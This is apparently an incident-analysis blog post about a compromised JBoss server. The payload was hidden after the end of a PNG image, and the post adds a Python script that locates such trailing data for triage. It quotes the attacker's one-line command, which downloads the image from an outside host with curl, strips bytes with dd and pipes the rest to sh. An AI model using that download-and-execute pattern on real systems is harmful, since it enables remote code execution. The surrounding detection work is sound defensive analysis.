Covert channels: Hiding shell scripts in PNG files
A colleague made me aware of a JBoss server having been compromised. Upon inspection, one of the processes run by the JBoss user account was this one:

    sh -c curl hxxp://img1.imagehousing.com/0/beauty-287196.png -k|dd skip=2446 bs=1|sh

This is a rather elegant way of disguising malicious code. If we first take a look at the png file: […]
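The pipeline above downloads an image, uses dd to skip a fixed number of bytes (2446) and hands whatever follows to sh. A valid PNG ends with its IEND chunk, so any bytes after that chunk are not image data and are exactly where such a payload would sit. The following script is an added example (not code from the original post) that walks the PNG chunk structure, verifies each chunk CRC, and reports the offset at which trailing data begins so it can be compared against the skip= value seen in a suspicious command line. The sample PNG and its appended text are constructed inline for demonstration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: 4-byte big-endian length, type, data, CRC32 over type+data."""
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_sample_png(trailing: bytes = b"") -> bytes:
    """Constructed sample: a minimal valid 1x1 RGB PNG, optionally with bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, RGB, no interlace
    raw_scanline = b"\x00" + b"\x00\x00\x00"            # filter byte 0 + one black pixel
    idat = zlib.compress(raw_scanline)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + trailing)


def find_trailing_data(png: bytes):
    """Parse chunks up to IEND and return (offset_after_IEND, trailing_bytes).

    Raises ValueError on a malformed file (bad signature, truncated chunk, CRC mismatch,
    or no IEND), since a broken structure is itself worth flagging during triage.
    """
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data_start = pos + 8
        chunk_end = data_start + length + 4  # data plus 4-byte CRC
        if chunk_end > len(png):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        expected = zlib.crc32(ctype + png[data_start:data_start + length]) & 0xFFFFFFFF
        actual = struct.unpack(">I", png[chunk_end - 4:chunk_end])[0]
        if expected != actual:
            raise ValueError(f"CRC mismatch in chunk {ctype!r} at offset {pos}")
        pos = chunk_end
        if ctype == b"IEND":
            return pos, png[pos:]
    raise ValueError("no IEND chunk found")


def triage(png: bytes) -> dict:
    """Summarise what an analyst wants to know: where non-image bytes start and whether they look like text."""
    offset, tail = find_trailing_data(png)
    printable = sum(1 for b in tail if 32 <= b < 127 or b in b"\r\n\t")
    return {
        "trailing_offset": offset,                     # compare with dd skip=<N> bs=1
        "trailing_length": len(tail),
        "looks_like_text": bool(tail) and printable / len(tail) > 0.9,
    }


if __name__ == "__main__":
    # Constructed demonstration: a clean image and one with appended text after IEND.
    clean = build_sample_png()
    tainted = build_sample_png(b"# constructed trailing data\n")
    print("clean  :", triage(clean))
    print("tainted:", triage(tainted))
```

On a real file, read it with open(path, "rb") and pass the bytes to triage(); a non-zero trailing_length on a file served as an image, especially one whose trailing_offset matches a skip= value observed in process arguments, is the indicator this post describes. Note that some legitimate tools also append metadata after IEND, so the offset and content should be reviewed rather than treated as proof on their own.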